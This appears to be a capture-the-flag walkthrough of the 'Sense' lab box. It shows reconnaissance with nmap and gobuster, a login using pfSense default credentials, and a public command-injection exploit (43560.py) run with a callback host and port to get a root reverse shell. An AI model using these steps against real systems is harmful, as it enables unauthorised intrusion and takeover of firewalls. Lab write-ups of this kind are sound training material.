Again, we start with nmap -sC -sV -Pn -p- -oA ./Sense 10.10.10.60
We start with HTTP and HTTPS. As with all strictly web based boxes, run a gobuster on it using:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u https://10.10.10.60:443 -k -x php,txt
The -k flag bypasses the certificate validation error that you would get without it and -x is the extension flag to look for php and txt files.
Gobuster shows us there is a changelog.txt and a system-users.txt file that we can "snag". Let's see what those say. It might give us a glimpse into what is running and what version.
OK. So we're dealing with pfSense with a Username:Password combination of Rohit:"company defaults". Looking on pfSense's website, we find that the default password is pfsense. Let's try logging in as rohit:pfsense. We can successfully log in with those credentials and we see that pfSense is at version 2.1.3-RELEASE and on FreeBSD 8.3-RELEASE-p16
Let's see what vulns exist for that version. There are a few, in particular a Command Injection one to status_rrd_graph_img.php. (5th from the bottom and using 43560.py)
Let's see what the exploit looks like.
Looks simple enough. It asks for the remote host, local host, local port, username, and password. We have all those things.
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.10 --lport 9999 --username rohit --password pfsense
Awesome. Now who am I on as? Surprise! Instant 1 step Root Shell. I love them when they're easy.